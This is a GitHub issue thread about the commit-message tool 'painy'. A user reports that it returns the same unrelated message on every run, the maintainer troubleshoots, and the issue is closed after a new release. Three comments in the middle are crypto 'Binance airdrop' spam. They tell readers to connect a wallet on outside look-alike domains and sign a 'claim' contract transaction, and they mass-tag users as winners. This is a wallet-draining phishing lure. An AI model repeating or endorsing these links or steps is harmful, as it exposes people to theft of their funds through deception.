### ISSUE TITLE
Issue with painy on Ubuntu 20.04 laptop

### ISSUE THREAD

**Issue by icaoberg** [lanesket/painy#4] opened 2023-08-05 00:57 UTC
I am running painy on several machines and it works great (thanks so much!). 

But for whatever reason, on this particular Ubuntu 20.04 laptop, I always get the same comment, over and over again. The comment is not even related to the contents/diff on the file.

```
(base) --- falcon/halcon ‹icaoberg-upgrade* MM› » painy -i comment
Changed files: halcon/search.py
Commit message:
Refactor square function. Use math.pow instead of multiplication.
==========================================================================================================================
Try another one? y/n: y
```

It doesn't matter how many times I regenerate it, I get the same comment on any file commit.

Any feedback or ideas?

**Comment by lanesket** [comment] 2023-08-08 09:08
@icaoberg Hello, have you tried this in another repository on the same machine? Has it the same behavior?
Also even if the context (git diff result) is the same, by default temperature (generation parameter which affects the determinism of model responses) is 1, not 0, so the API response must be different each request, so it's strange.

**Comment by icaoberg** [comment] 2023-09-06 17:15
@lanesket I tried it on another Linux system running Zorin and I get the same exact result. So I wonder if this is an issue related to my key?

```
(base) ➜  hubmapbags git:(icaoberg-patch-1) ✗ painy comment
Changed files: hubmapbags/anatomy.py, hubmapbags/utilities.py
Commit message:
Refactor square function. Use math.pow instead of multiplication.
```

this is another project so different source code. I don't know what is happening.

**Comment by lanesket** [comment] 2023-09-12 11:29
@icaoberg Unfortunately I can't reproduce this error. You might want to try making some request to their OpenAI API manually to see the response, and maybe try a different key. Here's a link to endpoint, which is used - https://platform.openai.com/docs/api-reference/chat/create.
But in general this seems like very strange behavior to me, since it should definitely not depend on the operating system and if `git diff` is different, the result should be different.

**Comment by manoharkumarmahto** [comment] 2023-12-26 21:11
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by mohamedata-code** [comment] 2023-12-30 14:05
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @ihubanov, @soul-ride, @northtree, @BjoernSteinmetz, @fl0wjacky, @nelbren, @arthasyey, @yistc, @nofeetbird0321, @marcosmeoni

**Comment by mohamedata-code** [comment] 2023-12-30 17:08
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @simonfester, @meminozturk, @xiaozhun, @DominikK0702, @chamorin, @DonLemonn, @garywangiam02, @1337b0t, @wnma3mz, @kulig

**Comment by icaoberg** [comment] 2023-12-31 23:10
@lanesket if I uninstall `painy` and reinstall this issue goes away for away for a while. I need to pinpoint the error but I am sure this is related to the `openai` package.

**Comment by lanesket** [comment] 2024-01-03 14:47
Closing the issue. The new version is available, deleted all previous releases due to different errors.

**Closed as completed by lanesket** 2024-01-03 14:47 UTC
